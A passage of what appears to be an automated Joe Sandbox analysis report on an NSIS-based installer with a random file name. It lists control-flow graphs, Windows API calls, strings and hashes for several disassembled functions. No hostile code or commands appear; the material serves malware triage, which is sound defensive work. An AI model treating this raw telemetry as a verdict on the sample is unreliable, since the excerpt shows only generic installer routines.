                                                                                                                                                                                                                                control_flow_graph 194 403f9a-403fac 195 403fb2-403fb8 194->195 196 404113-404122 194->196 195->196 197 403fbe-403fc7 195->197 198 404171-404186 196->198 199 404124-40416c GetDlgItem * 2 call 404499 SetClassLongW call 40140b 196->199 203 403fc9-403fd6 SetWindowPos 197->203 204 403fdc-403fe3 197->204 201 4041c6-4041cb call 4044e5 198->201 202 404188-40418b 198->202 199->198 216 4041d0-4041eb 201->216 206 40418d-404198 call 401389 202->206 207 4041be-4041c0 202->207 203->204 209 403fe5-403fff ShowWindow 204->209 210 404027-40402d 204->210 206->207 233 40419a-4041b9 SendMessageW 206->233 207->201 215 404466 207->215 217 404100-40410e call 404500 209->217 218 404005-404018 GetWindowLongW 209->218 212 404046-404049 210->212 213 40402f-404041 DestroyWindow 210->213 223 40404b-404057 SetWindowLongW 212->223 224 40405c-404062 212->224 221 404443-404449 213->221 222 404468-40446f 215->222 227 4041f4-4041fa 216->227 228 4041ed-4041ef call 40140b 216->228 217->222 218->217 219 40401e-404021 ShowWindow 218->219 219->210 221->215 229 40444b-404451 221->229 223->222 224->217 232 404068-404077 GetDlgItem 224->232 230 404200-40420b 227->230 231 404424-40443d DestroyWindow EndDialog 227->231 228->227 229->215 236 404453-40445c ShowWindow 229->236 230->231 237 404211-40425e call 40657a call 404499 * 3 GetDlgItem 230->237 231->221 238 404096-404099 232->238 239 404079-404090 SendMessageW IsWindowEnabled 232->239 233->222 236->215 266 404260-404265 237->266 267 404268-4042a4 ShowWindow KiUserCallbackDispatcher call 4044bb EnableWindow 237->267 241 40409b-40409c 238->241 242 40409e-4040a1 238->242 239->215 239->238 244 4040cc-4040d1 call 404472 241->244 245 4040a3-4040a9 242->245 246 4040af-4040b4 242->246 244->217 249 4040ea-4040fa SendMessageW 245->249 250 4040ab-4040ad 245->250 246->249 251 4040b6-4040bc 246->251 249->217 250->244 254 4040d3-4040dc call 40140b 251->254 255 4040be-4040c4 call 40140b 251->255 254->217 264 4040de-4040e8 254->264 262 4040ca 255->262 262->244 264->262 266->267 270 4042a6-4042a7 267->270 271 4042a9 267->271 272 4042ab-4042d9 GetSystemMenu EnableMenuItem SendMessageW 270->272 271->272 273 4042db-4042ec SendMessageW 272->273 274 4042ee 272->274 275 4042f4-404333 call 4044ce call 403f7b call 40653d lstrlenW call 40657a SetWindowTextW call 401389 273->275 274->275 275->216 286 404339-40433b 275->286 286->216 287 404341-404345 286->287 288 404364-404378 DestroyWindow 287->288 289 404347-40434d 287->289 288->221 291 40437e-4043ab CreateDialogParamW 288->291 289->215 290 404353-404359 289->290 290->216 292 40435f 290->292 291->221 293 4043b1-404408 call 404499 GetDlgItem GetWindowRect ScreenToClient SetWindowPos call 401389 291->293 292->215 293->215 298 40440a-40441d ShowWindow call 4044e5 293->298 300 404422 298->300 300->221
                                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                                • SetWindowPos.USER32(?,00000000,00000000,00000000,00000000,00000013), ref: 00403FD6
                                                                                                                                                                                                                                • ShowWindow.USER32(?), ref: 00403FF6
                                                                                                                                                                                                                                • GetWindowLongW.USER32(?,000000F0), ref: 00404008
                                                                                                                                                                                                                                • ShowWindow.USER32(?,00000004), ref: 00404021
                                                                                                                                                                                                                                • DestroyWindow.USER32 ref: 00404035
                                                                                                                                                                                                                                • SetWindowLongW.USER32(?,00000000,00000000), ref: 0040404E
                                                                                                                                                                                                                                • GetDlgItem.USER32(?,?), ref: 0040406D
                                                                                                                                                                                                                                • SendMessageW.USER32(00000000,000000F3,00000000,00000000), ref: 00404081
                                                                                                                                                                                                                                • IsWindowEnabled.USER32(00000000), ref: 00404088
                                                                                                                                                                                                                                • GetDlgItem.USER32(?,00000001), ref: 00404133
                                                                                                                                                                                                                                • GetDlgItem.USER32(?,00000002), ref: 0040413D
                                                                                                                                                                                                                                • SetClassLongW.USER32(?,000000F2,?), ref: 00404157
                                                                                                                                                                                                                                • SendMessageW.USER32(0000040F,00000000,00000001,?), ref: 004041A8
                                                                                                                                                                                                                                • GetDlgItem.USER32(?,00000003), ref: 0040424E
                                                                                                                                                                                                                                • ShowWindow.USER32(00000000,?), ref: 0040426F
                                                                                                                                                                                                                                • KiUserCallbackDispatcher.NTDLL(?,?), ref: 00404281
                                                                                                                                                                                                                                • EnableWindow.USER32(?,?), ref: 0040429C
                                                                                                                                                                                                                                • GetSystemMenu.USER32(?,00000000,0000F060,00000001), ref: 004042B2
                                                                                                                                                                                                                                • EnableMenuItem.USER32(00000000), ref: 004042B9
                                                                                                                                                                                                                                • SendMessageW.USER32(?,000000F4,00000000,00000001), ref: 004042D1
                                                                                                                                                                                                                                • SendMessageW.USER32(?,00000401,00000002,00000000), ref: 004042E4
                                                                                                                                                                                                                                • lstrlenW.KERNEL32(0042D268,?,0042D268,00000000), ref: 0040430E
                                                                                                                                                                                                                                • SetWindowTextW.USER32(?,0042D268), ref: 00404322
                                                                                                                                                                                                                                • ShowWindow.USER32(?,0000000A), ref: 00404456
                                                                                                                                                                                                                                Strings
                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                • Source File: 0000001E.00000002.4673126984.0000000000401000.00000020.00000001.01000000.0000000C.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                • Associated: 0000001E.00000002.4673058067.0000000000400000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                                                • Associated: 0000001E.00000002.4673235120.0000000000408000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                                                • Associated: 0000001E.00000002.4673311494.000000000040A000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                                                • Associated: 0000001E.00000002.4673578217.000000000042C000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                                                • Associated: 0000001E.00000002.4673668876.000000000042F000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                                                • Associated: 0000001E.00000002.4673763150.0000000000431000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                                                • Associated: 0000001E.00000002.4673870503.0000000000436000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                                                • Associated: 0000001E.00000002.4673962510.0000000000440000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                                                • Associated: 0000001E.00000002.4674080288.000000000044D000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                                                • Associated: 0000001E.00000002.4674539159.0000000000493000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                • Snapshot File: hcaresult_30_2_400000_shmhprg0nvltzt.jbxd
                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                • API ID: Window$Item$MessageSendShow$Long$EnableMenu$CallbackClassDestroyDispatcherEnabledSystemTextUserlstrlen
                                                                                                                                                                                                                                • String ID: q
                                                                                                                                                                                                                                • API String ID: 121052019-1563958681
                                                                                                                                                                                                                                • Opcode ID: 655396db076bddd1a804ad939a9de1a35d1e50ec2b89a3d41d0d0026322ce3ca
                                                                                                                                                                                                                                • Instruction ID: 19e8ffe36521fda3862950d2389d84f1ef0c133ac5ff71005f69e3a94542e2f3
                                                                                                                                                                                                                                • Opcode Fuzzy Hash: 655396db076bddd1a804ad939a9de1a35d1e50ec2b89a3d41d0d0026322ce3ca
                                                                                                                                                                                                                                • Instruction Fuzzy Hash: DDC1A1B1A00704ABDB206F61EE49E2B3A68FB84746F15053EF741B61F1CB799841DB2D
                                                                                                                                                                                                                                Uniqueness

                                                                                                                                                                                                                                Uniqueness Score: -1.00%

                                                                                                                                                                                                                                Function 00403BEC Relevance: 44.0, APIs: 13, Strings: 12, Instructions: 215stringregistryCOMMON
                                                                                                                                                                                                                                Download Yara Rule

                                                                                                                                                                                                                                Control-flow Graph

                                                                                                                                                                                                                                • Executed
                                                                                                                                                                                                                                • Not Executed
                                                                                                                                                                                                                                control_flow_graph 301 403bec-403c04 call 40690a 304 403c06-403c16 call 406484 301->304 305 403c18-403c4f call 40640b 301->305 314 403c72-403c9b call 403ec2 call 405f14 304->314 310 403c51-403c62 call 40640b 305->310 311 403c67-403c6d lstrcatW 305->311 310->311 311->314 319 403ca1-403ca6 314->319 320 403d2d-403d35 call 405f14 314->320 319->320 321 403cac-403cd4 call 40640b 319->321 326 403d43-403d68 LoadImageW 320->326 327 403d37-403d3e call 40657a 320->327 321->320 328 403cd6-403cda 321->328 330 403de9-403df1 call 40140b 326->330 331 403d6a-403d9a RegisterClassW 326->331 327->326 332 403cec-403cf8 lstrlenW 328->332 333 403cdc-403ce9 call 405e39 328->333 342 403df3-403df6 330->342 343 403dfb-403e06 call 403ec2 330->343 334 403da0-403de4 SystemParametersInfoW CreateWindowExW 331->334 335 403eb8 331->335 340 403d20-403d28 call 405e0c call 40653d 332->340 341 403cfa-403d08 lstrcmpiW 332->341 333->332 334->330 339 403eba-403ec1 335->339 340->320 341->340 346 403d0a-403d14 GetFileAttributesW 341->346 342->339 354 403e0c-403e26 ShowWindow call 40689a 343->354 355 403e8f-403e90 call 405672 343->355 349 403d16-403d18 346->349 350 403d1a-403d1b call 405e58 346->350 349->340 349->350 350->340 362 403e32-403e44 GetClassInfoW 354->362 363 403e28-403e2d call 40689a 354->363 358 403e95-403e97 355->358 360 403eb1-403eb3 call 40140b 358->360 361 403e99-403e9f 358->361 360->335 361->342 364 403ea5-403eac call 40140b 361->364 367 403e46-403e56 GetClassInfoW RegisterClassW 362->367 368 403e5c-403e7f DialogBoxParamW call 40140b 362->368 363->362 364->342 367->368 372 403e84-403e8d call 403b3c 368->372 372->339
                                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                                  • Part of subcall function 0040690A: GetModuleHandleA.KERNEL32(?,00000020,?,0040363D,0000000B), ref: 0040691C
                                                                                                                                                                                                                                  • Part of subcall function 0040690A: GetProcAddress.KERNEL32(00000000,?), ref: 00406937
                                                                                                                                                                                                                                • lstrcatW.KERNEL32(1033,0042D268), ref: 00403C6D
                                                                                                                                                                                                                                • lstrlenW.KERNEL32(Call,?,?,?,Call,00000000,C:\Users\user\AppData\Local\Temp,1033,0042D268,80000001,Control Panel\Desktop\ResourceLocale,00000000,0042D268,00000000,00000002,76F73420), ref: 00403CED
                                                                                                                                                                                                                                • lstrcmpiW.KERNEL32(?,.exe,Call,?,?,?,Call,00000000,C:\Users\user\AppData\Local\Temp,1033,0042D268,80000001,Control Panel\Desktop\ResourceLocale,00000000,0042D268,00000000), ref: 00403D00
                                                                                                                                                                                                                                • GetFileAttributesW.KERNEL32(Call,?,00000000,?), ref: 00403D0B
                                                                                                                                                                                                                                • LoadImageW.USER32(00000067,00000001,00000000,00000000,00008040,C:\Users\user\AppData\Local\Temp), ref: 00403D54
                                                                                                                                                                                                                                  • Part of subcall function 00406484: wsprintfW.USER32 ref: 00406491
                                                                                                                                                                                                                                • RegisterClassW.USER32(00433EA0), ref: 00403D91
                                                                                                                                                                                                                                • SystemParametersInfoW.USER32(00000030,00000000,?,00000000), ref: 00403DA9
                                                                                                                                                                                                                                • CreateWindowExW.USER32(00000080,_Nb,00000000,80000000,?,?,?,?,00000000,00000000,00000000), ref: 00403DDE
                                                                                                                                                                                                                                • ShowWindow.USER32(00000005,00000000,?,00000000,?), ref: 00403E14
                                                                                                                                                                                                                                • GetClassInfoW.USER32(00000000,RichEdit20W,00433EA0), ref: 00403E40
                                                                                                                                                                                                                                • GetClassInfoW.USER32(00000000,RichEdit,00433EA0), ref: 00403E4D
                                                                                                                                                                                                                                • RegisterClassW.USER32(00433EA0), ref: 00403E56
                                                                                                                                                                                                                                • DialogBoxParamW.USER32(?,00000000,00403F9A,00000000), ref: 00403E75
                                                                                                                                                                                                                                Strings
                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                • Source File: 0000001E.00000002.4673126984.0000000000401000.00000020.00000001.01000000.0000000C.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                • Associated: 0000001E.00000002.4673058067.0000000000400000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                                                • Associated: 0000001E.00000002.4673235120.0000000000408000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                                                • Associated: 0000001E.00000002.4673311494.000000000040A000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                                                • Associated: 0000001E.00000002.4673578217.000000000042C000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                                                • Associated: 0000001E.00000002.4673668876.000000000042F000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                                                • Associated: 0000001E.00000002.4673763150.0000000000431000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                                                • Associated: 0000001E.00000002.4673870503.0000000000436000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                                                • Associated: 0000001E.00000002.4673962510.0000000000440000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                                                • Associated: 0000001E.00000002.4674080288.000000000044D000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                                                • Associated: 0000001E.00000002.4674539159.0000000000493000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                • Snapshot File: hcaresult_30_2_400000_shmhprg0nvltzt.jbxd
                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                • API ID: Class$Info$RegisterWindow$AddressAttributesCreateDialogFileHandleImageLoadModuleParamParametersProcShowSystemlstrcatlstrcmpilstrlenwsprintf
                                                                                                                                                                                                                                • String ID: .DEFAULT\Control Panel\International$.exe$1033$C:\Users\user\AppData\Local\Temp$C:\Users\user\AppData\Local\Temp\$Call$Control Panel\Desktop\ResourceLocale$RichEd20$RichEd32$RichEdit$RichEdit20W$_Nb
                                                                                                                                                                                                                                • API String ID: 1975747703-1862882193
                                                                                                                                                                                                                                • Opcode ID: 4d5bc0c8b1d06963261e86736c564a0ba68078006fcf7539d23d4665df175b37
                                                                                                                                                                                                                                • Instruction ID: 6cc527b2f10929733706d009ff8c1d9b21e511251dd9cb17fe62514cef47010a
                                                                                                                                                                                                                                • Opcode Fuzzy Hash: 4d5bc0c8b1d06963261e86736c564a0ba68078006fcf7539d23d4665df175b37
                                                                                                                                                                                                                                • Instruction Fuzzy Hash: F561A670140300BED721AF66ED46F2B3A6CEB84B5AF40453FF945B62E2CB7D59018A6D
                                                                                                                                                                                                                                Uniqueness

                                                                                                                                                                                                                                Uniqueness Score: -1.00%

                                                                                                                                                                                                                                Function 0040307D Relevance: 24.7, APIs: 5, Strings: 9, Instructions: 181memoryCOMMON
                                                                                                                                                                                                                                Download Yara Rule

                                                                                                                                                                                                                                Control-flow Graph

                                                                                                                                                                                                                                • Executed
                                                                                                                                                                                                                                • Not Executed
                                                                                                                                                                                                                                control_flow_graph 375 40307d-4030cb GetTickCount GetModuleFileNameW call 40602d 378 4030d7-403105 call 40653d call 405e58 call 40653d GetFileSize 375->378 379 4030cd-4030d2 375->379 387 4031f0-4031fe call 403019 378->387 388 40310b 378->388 380 4032ad-4032b1 379->380 394 403200-403203 387->394 395 403253-403258 387->395 390 403110-403127 388->390 392 403129 390->392 393 40312b-403134 call 4034cf 390->393 392->393 401 40325a-403262 call 403019 393->401 402 40313a-403141 393->402 397 403205-40321d call 4034e5 call 4034cf 394->397 398 403227-403251 GlobalAlloc call 4034e5 call 4032b4 394->398 395->380 397->395 421 40321f-403225 397->421 398->395 426 403264-403275 398->426 401->395 406 403143-403157 call 405fe8 402->406 407 4031bd-4031c1 402->407 412 4031cb-4031d1 406->412 424 403159-403160 406->424 411 4031c3-4031ca call 403019 407->411 407->412 411->412 417 4031e0-4031e8 412->417 418 4031d3-4031dd call 4069f7 412->418 417->390 425 4031ee 417->425 418->417 421->395 421->398 424->412 430 403162-403169 424->430 425->387 427 403277 426->427 428 40327d-403282 426->428 427->428 431 403283-403289 428->431 430->412 432 40316b-403172 430->432 431->431 433 40328b-4032a6 SetFilePointer call 405fe8 431->433 432->412 434 403174-40317b 432->434 438 4032ab 433->438 434->412 435 40317d-40319d 434->435 435->395 437 4031a3-4031a7 435->437 439 4031a9-4031ad 437->439 440 4031af-4031b7 437->440 438->380 439->425 439->440 440->412 441 4031b9-4031bb 440->441 441->412
                                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                                • GetTickCount.KERNEL32 ref: 0040308E
                                                                                                                                                                                                                                • GetModuleFileNameW.KERNEL32(00000000,C:\Program Files (x86)\E6l40hhe\shmhprg0nvltzt.exe,00000400,?,?,?,?,?,0040387D,?), ref: 004030AA
                                                                                                                                                                                                                                  • Part of subcall function 0040602D: GetFileAttributesW.KERNELBASE(00000003,004030BD,C:\Program Files (x86)\E6l40hhe\shmhprg0nvltzt.exe,80000000,00000003,?,?,?,?,?,0040387D,?), ref: 00406031
                                                                                                                                                                                                                                  • Part of subcall function 0040602D: CreateFileW.KERNELBASE(?,?,00000001,00000000,?,00000001,00000000,?,?,?,?,?,0040387D,?), ref: 00406053
                                                                                                                                                                                                                                • GetFileSize.KERNEL32(00000000,00000000,00444000,00000000,C:\Program Files (x86)\E6l40hhe,C:\Program Files (x86)\E6l40hhe,C:\Program Files (x86)\E6l40hhe\shmhprg0nvltzt.exe,C:\Program Files (x86)\E6l40hhe\shmhprg0nvltzt.exe,80000000,00000003,?,?,?,?,?,0040387D), ref: 004030F6
                                                                                                                                                                                                                                • GlobalAlloc.KERNELBASE(00000040,}8@,?,?,?,?,?,0040387D,?), ref: 0040322C
                                                                                                                                                                                                                                Strings
                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                • Source File: 0000001E.00000002.4673126984.0000000000401000.00000020.00000001.01000000.0000000C.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                • Associated: 0000001E.00000002.4673058067.0000000000400000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                                                • Associated: 0000001E.00000002.4673235120.0000000000408000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                                                • Associated: 0000001E.00000002.4673311494.000000000040A000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                                                • Associated: 0000001E.00000002.4673578217.000000000042C000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                                                • Associated: 0000001E.00000002.4673668876.000000000042F000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                                                • Associated: 0000001E.00000002.4673763150.0000000000431000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                                                • Associated: 0000001E.00000002.4673870503.0000000000436000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                                                • Associated: 0000001E.00000002.4673962510.0000000000440000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                                                • Associated: 0000001E.00000002.4674080288.000000000044D000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                                                • Associated: 0000001E.00000002.4674539159.0000000000493000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                • Snapshot File: hcaresult_30_2_400000_shmhprg0nvltzt.jbxd
                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                • API ID: File$AllocAttributesCountCreateGlobalModuleNameSizeTick
                                                                                                                                                                                                                                • String ID: C:\Program Files (x86)\E6l40hhe$C:\Program Files (x86)\E6l40hhe\shmhprg0nvltzt.exe$C:\Users\user\AppData\Local\Temp\$Error launching installer$Inst$Installer integrity check has failed. Common causes includeincomplete download and damaged media. Contact theinstaller's author $Null$soft$}8@
                                                                                                                                                                                                                                • API String ID: 2803837635-2212236119
                                                                                                                                                                                                                                • Opcode ID: b2925046ebf4ee23c20be954f21b6b8de3b8febbf6f0f410cc7df6a070a5bb34
                                                                                                                                                                                                                                • Instruction ID: 750c061bb954c4555836cecba7cc54c639b148d890841a972b43b12454d44aa7
                                                                                                                                                                                                                                • Opcode Fuzzy Hash: b2925046ebf4ee23c20be954f21b6b8de3b8febbf6f0f410cc7df6a070a5bb34
                                                                                                                                                                                                                                • Instruction Fuzzy Hash: 7951B571904204AFDB10AF65ED42B9E7EACAB48756F14807BF904B62D1C77C9F408B9D
                                                                                                                                                                                                                                Uniqueness

                                                                                                                                                                                                                                Uniqueness Score: -1.00%

                                                                                                                                                                                                                                Function 004032B4 Relevance: 17.7, APIs: 4, Strings: 6, Instructions: 166COMMON
                                                                                                                                                                                                                                Download Yara Rule

                                                                                                                                                                                                                                Control-flow Graph

                                                                                                                                                                                                                                • Executed
                                                                                                                                                                                                                                • Not Executed
                                                                                                                                                                                                                                control_flow_graph 506 4032b4-4032cb 507 4032d4-4032dd 506->507 508 4032cd 506->508 509 4032e6-4032eb 507->509 510 4032df 507->510 508->507 511 4032fb-403308 call 4034cf 509->511 512 4032ed-4032f6 call 4034e5 509->512 510->509 516 4034bd 511->516 517 40330e-403312 511->517 512->511 518 4034bf-4034c0 516->518 519 403468-40346a 517->519 520 403318-403361 GetTickCount 517->520 523 4034c8-4034cc 518->523 521 4034aa-4034ad 519->521 522 40346c-40346f 519->522 524 4034c5 520->524 525 403367-40336f 520->525 526 4034b2-4034bb call 4034cf 521->526 527 4034af 521->527 522->524 528 403471 522->528 524->523 529 403371 525->529 530 403374-403382 call 4034cf 525->530 526->516 538 4034c2 526->538 527->526 532 403474-40347a 528->532 529->530 530->516 540 403388-403391 530->540 535 40347c 532->535 536 40347e-40348c call 4034cf 532->536 535->536 536->516 543 40348e-40349a call 4060df 536->543 538->524 542 403397-4033b7 call 406a65 540->542 547 403460-403462 542->547 548 4033bd-4033d0 GetTickCount 542->548 552 403464-403466 543->552 553 40349c-4034a6 543->553 547->518 550 4033d2-4033da 548->550 551 40341b-40341d 548->551 554 4033e2-403413 MulDiv wsprintfW call 40559f 550->554 555 4033dc-4033e0 550->555 556 403454-403458 551->556 557 40341f-403423 551->557 552->518 553->532 558 4034a8 553->558 563 403418 554->563 555->551 555->554 556->525 559 40345e 556->559 561 403425-40342c call 4060df 557->561 562 40343a-403445 557->562 558->524 559->524 566 403431-403433 561->566 565 403448-40344c 562->565 563->551 565->542 567 403452 565->567 566->552 568 403435-403438 566->568 567->524 568->565
                                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                                Strings
                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                • Source File: 0000001E.00000002.4673126984.0000000000401000.00000020.00000001.01000000.0000000C.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                • Associated: 0000001E.00000002.4673058067.0000000000400000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                                                • Associated: 0000001E.00000002.4673235120.0000000000408000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                                                • Associated: 0000001E.00000002.4673311494.000000000040A000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                                                • Associated: 0000001E.00000002.4673578217.000000000042C000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                                                • Associated: 0000001E.00000002.4673668876.000000000042F000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                                                • Associated: 0000001E.00000002.4673763150.0000000000431000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                                                • Associated: 0000001E.00000002.4673870503.0000000000436000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                                                • Associated: 0000001E.00000002.4673962510.0000000000440000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                                                • Associated: 0000001E.00000002.4674080288.000000000044D000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                                                • Associated: 0000001E.00000002.4674539159.0000000000493000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                • Snapshot File: hcaresult_30_2_400000_shmhprg0nvltzt.jbxd
                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                • API ID: CountTick$wsprintf
                                                                                                                                                                                                                                • String ID: *B$ ZB$ A$ A$... %d%%$}8@
                                                                                                                                                                                                                                • API String ID: 551687249-3683892814
                                                                                                                                                                                                                                • Opcode ID: d1cfd4714e4687a3a26bd4ac3846c46955ae89f51795138bd42b88bfc39313c7
                                                                                                                                                                                                                                • Instruction ID: 54ab186c05730647c672001b6e56d135182c7b51176e178f40f708a1e84a381e
                                                                                                                                                                                                                                • Opcode Fuzzy Hash: d1cfd4714e4687a3a26bd4ac3846c46955ae89f51795138bd42b88bfc39313c7
                                                                                                                                                                                                                                • Instruction Fuzzy Hash: E251BD31810219EBCF11DF65DA44B9E7BB8AF05756F10827BE804BB2C1D7789E44CBA9
                                                                                                                                                                                                                                Uniqueness

                                                                                                                                                                                                                                Uniqueness Score: -1.00%

                                                                                                                                                                                                                                Function 0040176F Relevance: 15.9, APIs: 5, Strings: 4, Instructions: 145stringtimeCOMMON
                                                                                                                                                                                                                                Download Yara Rule

                                                                                                                                                                                                                                Control-flow Graph

                                                                                                                                                                                                                                • Executed
                                                                                                                                                                                                                                • Not Executed
                                                                                                                                                                                                                                control_flow_graph 569 40176f-401794 call 402da6 call 405e83 574 401796-40179c call 40653d 569->574 575 40179e-4017b0 call 40653d call 405e0c lstrcatW 569->575 580 4017b5-4017b6 call 4067c4 574->580 575->580 584 4017bb-4017bf 580->584 585 4017c1-4017cb call 406873 584->585 586 4017f2-4017f5 584->586 593 4017dd-4017ef 585->593 594 4017cd-4017db CompareFileTime 585->594 587 4017f7-4017f8 call 406008 586->587 588 4017fd-401819 call 40602d 586->588 587->588 596 40181b-40181e 588->596 597 40188d-4018b6 call 40559f call 4032b4 588->597 593->586 594->593 598 401820-40185e call 40653d * 2 call 40657a call 40653d call 405b9d 596->598 599 40186f-401879 call 40559f 596->599 609 4018b8-4018bc 597->609 610 4018be-4018ca SetFileTime 597->610 598->584 631 401864-401865 598->631 611 401882-401888 599->611 609->610 613 4018d0-4018db CloseHandle 609->613 610->613 614 402c33 611->614 617 4018e1-4018e4 613->617 618 402c2a-402c2d 613->618 619 402c35-402c39 614->619 621 4018e6-4018f7 call 40657a lstrcatW 617->621 622 4018f9-4018fc call 40657a 617->622 618->614 628 401901-4023a2 call 405b9d 621->628 622->628 628->618 628->619 631->611 633 401867-401868 631->633 633->599
                                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                                • lstrcatW.KERNEL32(00000000,00000000), ref: 004017B0
                                                                                                                                                                                                                                • CompareFileTime.KERNEL32(-00000014,?,Call,Call,00000000,00000000,Call,C:\Users\user\AppData\Local\Temp,?,?,00000031), ref: 004017D5
                                                                                                                                                                                                                                  • Part of subcall function 0040653D: lstrcpynW.KERNEL32(?,?,00000400,0040369D,00433F00,NSIS Error), ref: 0040654A
                                                                                                                                                                                                                                  • Part of subcall function 0040559F: lstrlenW.KERNEL32(Skipped: C:\Users\user\AppData\Local\Temp\nslEFEC.tmp\System.dll,00000000,00425A20,76F723A0,?,?,?,?,?,?,?,?,?,00403418,00000000,?), ref: 004055D7
                                                                                                                                                                                                                                  • Part of subcall function 0040559F: lstrlenW.KERNEL32(00403418,Skipped: C:\Users\user\AppData\Local\Temp\nslEFEC.tmp\System.dll,00000000,00425A20,76F723A0,?,?,?,?,?,?,?,?,?,00403418,00000000), ref: 004055E7
                                                                                                                                                                                                                                  • Part of subcall function 0040559F: lstrcatW.KERNEL32(Skipped: C:\Users\user\AppData\Local\Temp\nslEFEC.tmp\System.dll,00403418), ref: 004055FA
                                                                                                                                                                                                                                  • Part of subcall function 0040559F: SetWindowTextW.USER32(Skipped: C:\Users\user\AppData\Local\Temp\nslEFEC.tmp\System.dll,Skipped: C:\Users\user\AppData\Local\Temp\nslEFEC.tmp\System.dll), ref: 0040560C
                                                                                                                                                                                                                                  • Part of subcall function 0040559F: SendMessageW.USER32(?,00001004,00000000,00000000), ref: 00405632
                                                                                                                                                                                                                                  • Part of subcall function 0040559F: SendMessageW.USER32(?,0000104D,00000000,00000001), ref: 0040564C
                                                                                                                                                                                                                                  • Part of subcall function 0040559F: SendMessageW.USER32(?,00001013,?,00000000), ref: 0040565A
                                                                                                                                                                                                                                Strings
                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                • Source File: 0000001E.00000002.4673126984.0000000000401000.00000020.00000001.01000000.0000000C.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                • Associated: 0000001E.00000002.4673058067.0000000000400000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                                                • Associated: 0000001E.00000002.4673235120.0000000000408000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                                                • Associated: 0000001E.00000002.4673311494.000000000040A000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                                                • Associated: 0000001E.00000002.4673578217.000000000042C000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                                                • Associated: 0000001E.00000002.4673668876.000000000042F000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                                                • Associated: 0000001E.00000002.4673763150.0000000000431000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                                                • Associated: 0000001E.00000002.4673870503.0000000000436000.00000004.00000001.01000000.0000000C.sdmpDownload File
